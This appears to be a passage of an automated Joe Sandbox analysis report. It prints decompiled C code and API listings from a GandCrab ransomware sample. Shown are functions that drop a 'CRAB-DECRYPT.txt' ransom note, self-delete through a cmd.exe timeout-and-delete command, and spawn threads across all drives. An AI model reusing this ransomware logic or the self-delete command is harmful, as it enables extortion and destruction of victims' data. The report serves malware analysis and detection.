                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Freelstrlen$Alloc$Internet$Open$CloseHandleSleeplstrcatlstrcmpiwsprintf
                                    • String ID: POST$popkadurak
                                    • API String ID: 2554059081-2707760125
                                    • Opcode ID: 480ad2da5bb269fe5f59a08f3fbff8a253026a78838eaaf196424439b87fcb40
                                    • Instruction ID: 8c8fa093f0b72c2a2dd2782519082412607419f979909c6a2c46d6b34bbfbeb9
                                    • Opcode Fuzzy Hash: 480ad2da5bb269fe5f59a08f3fbff8a253026a78838eaaf196424439b87fcb40
                                    • Instruction Fuzzy Hash: 4341C075E40309ABEB109FA8DC41FEE7B79AFC8751F140115EA04B7241EB787698CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 93%
                                    			E0F1472A0(intOrPtr* __ecx) {
                                    				int _t42;
                                    				int _t48;
                                    				int _t51;
                                    				int _t54;
                                    				int _t57;
                                    				int _t60;
                                    				int _t63;
                                    				int _t66;
                                    				int _t70;
                                    				int _t72;
                                    				void* _t75;
                                    				intOrPtr* _t86;
                                    				int _t88;
                                    				int _t89;
                                    				int _t90;
                                    				int _t91;
                                    				int _t92;
                                    				int _t93;
                                    				int _t94;
                                    				void* _t95;
                                    
                                    				_t40 = lstrlenW;
                                    				_t86 = __ecx;
                                    				_t75 = 0;
                                    				if( *__ecx != 0) {
                                    					_t72 = lstrlenW( *(__ecx + 8));
                                    					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
                                    					_t40 = lstrlenW;
                                    					_t75 = _t3 + _t72;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
                                    					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
                                    					_t70 = lstrlenW( *(_t86 + 0x10));
                                    					_t7 = _t95 + 4; // 0x4
                                    					_t75 = _t7 + _t70 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
                                    					_t94 = lstrlenW( *(_t86 + 0x20));
                                    					_t66 = lstrlenW( *(_t86 + 0x1c));
                                    					_t11 = _t94 + 4; // 0x4
                                    					_t75 = _t11 + _t66 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
                                    					_t93 = lstrlenW( *(_t86 + 0x2c));
                                    					_t63 = lstrlenW( *(_t86 + 0x28));
                                    					_t15 = _t93 + 4; // 0x4
                                    					_t75 = _t15 + _t63 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
                                    					_t92 = lstrlenW( *(_t86 + 0x38));
                                    					_t60 = lstrlenW( *(_t86 + 0x34));
                                    					_t19 = _t92 + 4; // 0x4
                                    					_t75 = _t19 + _t60 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
                                    					_t91 = lstrlenW( *(_t86 + 0x44));
                                    					_t57 = lstrlenW( *(_t86 + 0x40));
                                    					_t23 = _t91 + 4; // 0x4
                                    					_t75 = _t23 + _t57 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
                                    					_t90 = lstrlenW( *(_t86 + 0x50));
                                    					_t54 = lstrlenW( *(_t86 + 0x4c));
                                    					_t27 = _t90 + 4; // 0x4
                                    					_t75 = _t27 + _t54 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
                                    					_t89 = lstrlenW( *(_t86 + 0x5c));
                                    					_t51 = lstrlenW( *(_t86 + 0x58));
                                    					_t31 = _t89 + 4; // 0x4
                                    					_t75 = _t31 + _t51 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
                                    					_t75 = _t75 + 0x14;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
                                    					_t88 = lstrlenW( *(_t86 + 0x7c));
                                    					_t48 = lstrlenW( *(_t86 + 0x78));
                                    					_t36 = _t88 + 4; // 0x4
                                    					_t75 = _t36 + _t48 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
                                    					return _t75;
                                    				} else {
                                    					_t42 = lstrlenW( *(_t86 + 0x88));
                                    					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
                                    				}
                                    			}























                                    0x0f1472a0
                                    0x0f1472a8
                                    0x0f1472aa
                                    0x0f1472ae
                                    0x0f1472b3
                                    0x0f1472c1
                                    0x0f1472c4
                                    0x0f1472c9
                                    0x0f1472c9
                                    0x0f1472cf
                                    0x0f1472d9
                                    0x0f1472e0
                                    0x0f1472e4
                                    0x0f1472e7
                                    0x0f1472e7
                                    0x0f1472ed
                                    0x0f1472fb
                                    0x0f1472fd
                                    0x0f147305
                                    0x0f147308
                                    0x0f147308
                                    0x0f14730e
                                    0x0f14731c
                                    0x0f14731e
                                    0x0f147326
                                    0x0f147329
                                    0x0f147329
                                    0x0f14732f
                                    0x0f14733d
                                    0x0f14733f
                                    0x0f147347
                                    0x0f14734a
                                    0x0f14734a
                                    0x0f147350
                                    0x0f14735e
                                    0x0f147360
                                    0x0f147368
                                    0x0f14736b
                                    0x0f14736b
                                    0x0f147371
                                    0x0f14737f
                                    0x0f147381
                                    0x0f147389
                                    0x0f14738c
                                    0x0f14738c
                                    0x0f147392
                                    0x0f1473a0
                                    0x0f1473a2
                                    0x0f1473aa
                                    0x0f1473ad
                                    0x0f1473ad
                                    0x0f1473b3
                                    0x0f1473b5
                                    0x0f1473b5
                                    0x0f1473bc
                                    0x0f1473ca
                                    0x0f1473cc
                                    0x0f1473d4
                                    0x0f1473d7
                                    0x0f1473d7
                                    0x0f1473e0
                                    0x0f14740c
                                    0x0f1473e2
                                    0x0f1473e8
                                    0x0f147406
                                    0x0f147406

                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1472F2
                                    • lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1472FD
                                    • lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147313
                                    • lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F14731E
                                    • lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147334
                                    • lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F14733F
                                    • lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147355
                                    • lstrlenW.KERNEL32(0F144B36,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147360
                                    • lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147376
                                    • lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147381
                                    • lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147397
                                    • lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473A2
                                    • lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473C1
                                    • lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473CC
                                    • lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473E8
                                    • lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473F6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID:
                                    • API String ID: 1659193697-0
                                    • Opcode ID: a9c809e9d0ba6f1db82ead263ad7cd12837d4b09f419787ac01b84e6aced0d05
                                    • Instruction ID: c8efc062da3f59d813ff0bab75844c69a122068ab0bafc97016907a77bd4364e
                                    • Opcode Fuzzy Hash: a9c809e9d0ba6f1db82ead263ad7cd12837d4b09f419787ac01b84e6aced0d05
                                    • Instruction Fuzzy Hash: 64414F36140652EFD7129FB8DE8C794BBA1FF44326F094534E40683A61D776B8B8DB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 88%
                                    			E0F145F00(void* __ecx, intOrPtr __edx, void* __esi) {
                                    				CHAR* _v8;
                                    				intOrPtr _v12;
                                    				char _v267;
                                    				char _v268;
                                    				CHAR* _t10;
                                    				struct HINSTANCE__* _t13;
                                    				_Unknown_base(*)()* _t20;
                                    				void* _t24;
                                    				void* _t31;
                                    				void* _t35;
                                    
                                    				_t10 =  *0xf152a78; // 0x0
                                    				_v12 = __edx;
                                    				_t24 = __ecx;
                                    				_v8 = _t10;
                                    				_t31 = VirtualAlloc(0, 0xa, 0x3000, 4);
                                    				if(_t31 != 0) {
                                    					_t13 = GetModuleHandleA("ntdll.dll");
                                    					if(_t13 != 0) {
                                    						_t20 = GetProcAddress(_t13, "RtlComputeCrc32");
                                    						wsprintfA(_t31, "%Xeuropol",  *_t20(0x29a, _v8, lstrlenA(_v8), __esi));
                                    						_t35 = _t35 + 0xc;
                                    					}
                                    					_v268 = 0;
                                    					E0F149170( &_v267, 0, 0xff);
                                    					E0F145DC0( &_v268, _t31, lstrlenA(_t31));
                                    					E0F145E70( &_v268, _t24, _v12);
                                    					VirtualFree(_t31, 0, 0x8000);
                                    				}
                                    				return _t24;
                                    			}













                                    0x0f145f09
                                    0x0f145f1b
                                    0x0f145f1e
                                    0x0f145f20
                                    0x0f145f29
                                    0x0f145f2d
                                    0x0f145f38
                                    0x0f145f40
                                    0x0f145f49
                                    0x0f145f6c
                                    0x0f145f72
                                    0x0f145f75
                                    0x0f145f81
                                    0x0f145f8b
                                    0x0f145fa3
                                    0x0f145fb3
                                    0x0f145fc3
                                    0x0f145fc3
                                    0x0f145fd0

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,0000000A,00003000,00000004,00000000,00000000), ref: 0F145F23
                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0F145F38
                                    • GetProcAddress.KERNEL32(00000000,RtlComputeCrc32), ref: 0F145F49
                                    • lstrlenA.KERNEL32(00000000), ref: 0F145F54
                                    • wsprintfA.USER32 ref: 0F145F6C
                                    • _memset.LIBCMT ref: 0F145F8B
                                    • lstrlenA.KERNEL32(00000000), ref: 0F145F94
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F145FC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtuallstrlen$AddressAllocFreeHandleModuleProc_memsetwsprintf
                                    • String ID: %Xeuropol$RtlComputeCrc32$ntdll.dll
                                    • API String ID: 218840185-1387466253
                                    • Opcode ID: f0874cf3b31b618b3d1d78814e9834659d8bfa9739f91332ea22a23967c30131
                                    • Instruction ID: c35a3ebf1c435ae8cd002dfada9883d9ac1ebdabc507084e4e6b44014ef9d1ed
                                    • Opcode Fuzzy Hash: f0874cf3b31b618b3d1d78814e9834659d8bfa9739f91332ea22a23967c30131
                                    • Instruction Fuzzy Hash: 6C112B39E84304BBD7205FA4AC49FAE7B78AFC4B11F140064F905E2281DB7879A59E51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F146D40(void* __ecx) {
                                    				long _v8;
                                    				WCHAR* _t7;
                                    				signed int _t16;
                                    				void* _t21;
                                    				void* _t22;
                                    				void* _t25;
                                    
                                    				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
                                    				wsprintfW(_t25, L"%s\\CRAB-DECRYPT.txt", _t21);
                                    				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
                                    				if(_t22 != 0xffffffff) {
                                    					_t7 =  *0xf152a64; // 0xf152000
                                    					if(_t7 != 0) {
                                    						WriteFile(_t22,  *0xf152a64, lstrlenW(_t7) + _t11,  &_v8, 0);
                                    					}
                                    					CloseHandle(_t22);
                                    					_t16 = 1;
                                    				} else {
                                    					_t16 = 0 | GetLastError() == 0x000000b7;
                                    				}
                                    				VirtualFree(_t25, 0, 0x8000);
                                    				return _t16;
                                    			}









                                    0x0f146d5b
                                    0x0f146d63
                                    0x0f146d85
                                    0x0f146d8a
                                    0x0f146d9e
                                    0x0f146da5
                                    0x0f146dbe
                                    0x0f146dbe
                                    0x0f146dc5
                                    0x0f146dcb
                                    0x0f146d8c
                                    0x0f146d99
                                    0x0f146d99
                                    0x0f146dd8
                                    0x0f146de6

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F146E22,00000000,?,?), ref: 0F146D55
                                    • wsprintfW.USER32 ref: 0F146D63
                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F146D7F
                                    • GetLastError.KERNEL32(?,?), ref: 0F146D8C
                                    • lstrlenW.KERNEL32(0F152000,?,00000000,?,?), ref: 0F146DAE
                                    • WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0F146DBE
                                    • CloseHandle.KERNEL32(00000000,?,?), ref: 0F146DC5
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F146DD8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
                                    • String ID: %s\CRAB-DECRYPT.txt
                                    • API String ID: 2985722263-2724392667
                                    • Opcode ID: cc192db359cb9dd70944d3d69816d07d5ebabcfa55c422f22e76d949faacc371
                                    • Instruction ID: 7ae504722043ae1c057cb788087df97492ddd43ac4ab208ff2b583b5bc5cedf3
                                    • Opcode Fuzzy Hash: cc192db359cb9dd70944d3d69816d07d5ebabcfa55c422f22e76d949faacc371
                                    • Instruction Fuzzy Hash: 7D01927A3C0310BBF2301F64AD4AF6A365CDFC5F26F110120FB05A61C1DBA979698A69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F145350() {
                                    				WCHAR* _t6;
                                    				short* _t8;
                                    
                                    				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                    				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                    				if(_t6 != 0) {
                                    					GetModuleFileNameW(0, _t6, 0x200);
                                    					if(_t8 != 0) {
                                    						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
                                    						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
                                    					}
                                    				}
                                    				ExitProcess(0);
                                    			}





                                    0x0f145376
                                    0x0f14537a
                                    0x0f14537e
                                    0x0f145388
                                    0x0f145390
                                    0x0f145399
                                    0x0f1453b3
                                    0x0f1453b3
                                    0x0f145390
                                    0x0f1453bb

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F1454E9,00000000,?,?,?,?,0F145615,00000000,popkadurak,00000000), ref: 0F145366
                                    • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F145378
                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F145388
                                    • wsprintfW.USER32 ref: 0F145399
                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F1453B3
                                    • ExitProcess.KERNEL32 ref: 0F1453BB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
                                    • String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
                                    • API String ID: 4033023619-516011104
                                    • Opcode ID: 2c76671f935532948e176d6ba4c729f4741c96cbcd88eca92a32c9b15f583140
                                    • Instruction ID: a7e69dbd9184de0b9af2c5f41027965e0262eb069005331e34a83e8510f76201
                                    • Opcode Fuzzy Hash: 2c76671f935532948e176d6ba4c729f4741c96cbcd88eca92a32c9b15f583140
                                    • Instruction Fuzzy Hash: 70F0AC7A7C131077F1211A655C1FF472D199FC5F66F2A0015B708BE1C28AE474658AA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E0F142C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                    				struct tagPAINTSTRUCT _v68;
                                    				struct tagPAINTSTRUCT _v88;
                                    				short _v100;
                                    				intOrPtr _t13;
                                    				void* _t15;
                                    				struct HDC__* _t21;
                                    				int _t30;
                                    
                                    				_t13 =  *0xf14f290; // 0x21
                                    				asm("movdqu xmm0, [0xf14f280]");
                                    				_t30 = _a8;
                                    				_v88.fErase = _t13;
                                    				asm("movdqu [esp+0x10], xmm0");
                                    				_t15 = _t30 - 2;
                                    				if(_t15 == 0) {
                                    					CreateThread(0, 0, E0F142AD0, 0, 0, 0);
                                    					DestroyWindow(_a4);
                                    					return 0xdeadbeef;
                                    				} else {
                                    					if(_t15 == 0xd) {
                                    						_t21 = BeginPaint(_a4,  &_v68);
                                    						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
                                    						EndPaint(_a4,  &_v88);
                                    						return 0;
                                    					} else {
                                    						return DefWindowProcW(_a4, _t30, _a12, _a16);
                                    					}
                                    				}
                                    			}










                                    0x0f142c59
                                    0x0f142c5e
                                    0x0f142c66
                                    0x0f142c69
                                    0x0f142c70
                                    0x0f142c76
                                    0x0f142c79
                                    0x0f142ce9
                                    0x0f142cf2
                                    0x0f142d01
                                    0x0f142c7b
                                    0x0f142c7e
                                    0x0f142c9f
                                    0x0f142cbd
                                    0x0f142ccb
                                    0x0f142cd7
                                    0x0f142c80
                                    0x0f142c94
                                    0x0f142c94
                                    0x0f142c7e

                                    APIs
                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0F142C8A
                                    • BeginPaint.USER32(?,?), ref: 0F142C9F
                                    • lstrlenW.KERNEL32(?), ref: 0F142CAC
                                    • TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0F142CBD
                                    • EndPaint.USER32(?,?), ref: 0F142CCB
                                    • CreateThread.KERNEL32 ref: 0F142CE9
                                    • DestroyWindow.USER32(?), ref: 0F142CF2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
                                    • String ID: GandCrab!
                                    • API String ID: 572880375-2223329875
                                    • Opcode ID: 43079e2340fed2cabc4546af9f1e0462d87168a0032bcc8f34bcb66d0fab9fa3
                                    • Instruction ID: afe15e97842dd0c79b6e5a2a3de603ef0a3a283f881b4202d3b8b42487ef729c
                                    • Opcode Fuzzy Hash: 43079e2340fed2cabc4546af9f1e0462d87168a0032bcc8f34bcb66d0fab9fa3
                                    • Instruction Fuzzy Hash: E511B636144209ABE711DF54DC09FAA7BACFF88722F000616FD41D6190E771B5B4CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E0F143FF0(struct _SECURITY_ATTRIBUTES* __ecx) {
                                    				char _v612;
                                    				char _v644;
                                    				void* _v908;
                                    				void* _v912;
                                    				intOrPtr _v916;
                                    				intOrPtr _v920;
                                    				short _v924;
                                    				signed int _v928;
                                    				void* _v932;
                                    				void* _v936;
                                    				intOrPtr _v940;
                                    				intOrPtr _v944;
                                    				intOrPtr _v948;
                                    				long _v952;
                                    				struct _SECURITY_ATTRIBUTES* _v956;
                                    				struct _SECURITY_ATTRIBUTES* _v960;
                                    				struct _SECURITY_ATTRIBUTES* _v964;
                                    				char _v968;
                                    				void* _t67;
                                    				short _t68;
                                    				intOrPtr _t69;
                                    				int _t72;
                                    				long _t75;
                                    				signed int _t77;
                                    				signed int _t80;
                                    				intOrPtr* _t82;
                                    				void* _t84;
                                    				struct _SECURITY_ATTRIBUTES* _t87;
                                    				long _t88;
                                    				intOrPtr _t89;
                                    				intOrPtr _t92;
                                    				intOrPtr _t95;
                                    				char _t101;
                                    				intOrPtr _t106;
                                    				void _t110;
                                    				struct _SECURITY_ATTRIBUTES** _t114;
                                    				intOrPtr _t115;
                                    				signed int _t119;
                                    				void* _t121;
                                    
                                    				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
                                    				_t87 = __ecx;
                                    				_v964 = __ecx;
                                    				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
                                    				 *((intOrPtr*)(_t67 + 4)) = _t87;
                                    				_t88 = 0;
                                    				 *_t67 = 0x43;
                                    				_t68 =  *L"?:\\"; // 0x3a003f
                                    				_v924 = _t68;
                                    				_t69 =  *0xf14f350; // 0x5c
                                    				_v920 = _t69;
                                    				_v968 = GetTickCount();
                                    				_t114 =  &_v644;
                                    				_t110 = 0x41;
                                    				do {
                                    					_v924 = _t110;
                                    					_t72 = GetDriveTypeW( &_v924);
                                    					if(_t72 >= 2 && _t72 != 5) {
                                    						 *((intOrPtr*)(_t114 - 4)) = _v964;
                                    						_t84 = _t114 - 8;
                                    						 *_t84 = _t110;
                                    						 *_t114 = 0;
                                    						_t114[2] = 0;
                                    						_t114[3] = 0;
                                    						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0F146F40, _t84, 0, 0);
                                    						_t88 = _t88 + 1;
                                    						_t114 =  &(_t114[6]);
                                    					}
                                    					_t110 = _t110 + 1;
                                    				} while (_t110 <= 0x5a);
                                    				_v952 = _t88;
                                    				asm("xorps xmm0, xmm0");
                                    				_v956 = 0;
                                    				_v960 = 0;
                                    				asm("movlpd [esp+0x38], xmm0");
                                    				asm("movlpd [esp+0x30], xmm0");
                                    				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
                                    				_t75 = GetTickCount();
                                    				asm("xorps xmm0, xmm0");
                                    				_t115 = _v948;
                                    				_v932 = _t75 - _v968;
                                    				_t77 = 0;
                                    				_v964 = 0;
                                    				asm("movlpd [esp+0x40], xmm0");
                                    				if(_t88 < 2) {
                                    					_t95 = _v940;
                                    					_t106 = _v944;
                                    				} else {
                                    					_t26 = _t88 - 2; // -1
                                    					_t92 = _v940;
                                    					_t82 =  &_v612;
                                    					_t101 = (_t26 >> 1) + 1;
                                    					_v968 = _t101;
                                    					_v928 = _t101 + _t101;
                                    					_t106 = _v944;
                                    					do {
                                    						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
                                    						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
                                    						asm("adc edi, [eax-0x14]");
                                    						_t115 = _t115 +  *_t82;
                                    						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
                                    						asm("adc edx, [eax+0x4]");
                                    						_t82 = _t82 + 0x30;
                                    						_t41 =  &_v968;
                                    						 *_t41 = _v968 - 1;
                                    					} while ( *_t41 != 0);
                                    					_t77 = _v928;
                                    					_v968 = _t92;
                                    					_t88 = _v952;
                                    					_t95 = _v968;
                                    				}
                                    				if(_t77 >= _t88) {
                                    					_t89 = _v916;
                                    				} else {
                                    					_t80 = _t77 + _t77 * 2;
                                    					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
                                    					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
                                    				}
                                    				asm("adc edx, edi");
                                    				asm("adc edx, eax");
                                    				return E0F145670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
                                    			}










































                                    0x0f143ff6
                                    0x0f144008
                                    0x0f14400c
                                    0x0f144010
                                    0x0f14401b
                                    0x0f14401e
                                    0x0f144020
                                    0x0f144023
                                    0x0f144028
                                    0x0f14402c
                                    0x0f144031
                                    0x0f14403b
                                    0x0f14403f
                                    0x0f144046
                                    0x0f144050
                                    0x0f144054
                                    0x0f14405a
                                    0x0f144063
                                    0x0f144072
                                    0x0f144075
                                    0x0f144082
                                    0x0f144085
                                    0x0f14408b
                                    0x0f144092
                                    0x0f14409f
                                    0x0f1440a3
                                    0x0f1440a4
                                    0x0f1440a4
                                    0x0f1440a7
                                    0x0f1440a8
                                    0x0f1440b6
                                    0x0f1440ba
                                    0x0f1440bd
                                    0x0f1440c7
                                    0x0f1440cf
                                    0x0f1440d5
                                    0x0f1440db
                                    0x0f1440e1
                                    0x0f1440eb
                                    0x0f1440f2
                                    0x0f1440f6
                                    0x0f1440fa
                                    0x0f1440fc
                                    0x0f144104
                                    0x0f14410d
                                    0x0f14416c
                                    0x0f144170
                                    0x0f14410f
                                    0x0f14410f
                                    0x0f144112
                                    0x0f144118
                                    0x0f14411f
                                    0x0f144120
                                    0x0f144127
                                    0x0f14412b
                                    0x0f144130
                                    0x0f144137
                                    0x0f14413a
                                    0x0f14413e
                                    0x0f144148
                                    0x0f14414a
                                    0x0f14414e
                                    0x0f144151
                                    0x0f144154
                                    0x0f144154
                                    0x0f144154
                                    0x0f14415a
                                    0x0f14415e
                                    0x0f144162
                                    0x0f144166
                                    0x0f144166
                                    0x0f144176
                                    0x0f14419a
                                    0x0f144178
                                    0x0f144178
                                    0x0f144182
                                    0x0f144186
                                    0x0f14418d
                                    0x0f1441a4
                                    0x0f1441a8
                                    0x0f1441c6

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0F144010
                                    • GetTickCount.KERNEL32 ref: 0F144035
                                    • GetDriveTypeW.KERNEL32(?), ref: 0F14405A
                                    • CreateThread.KERNEL32 ref: 0F144099
                                    • WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0F1440DB
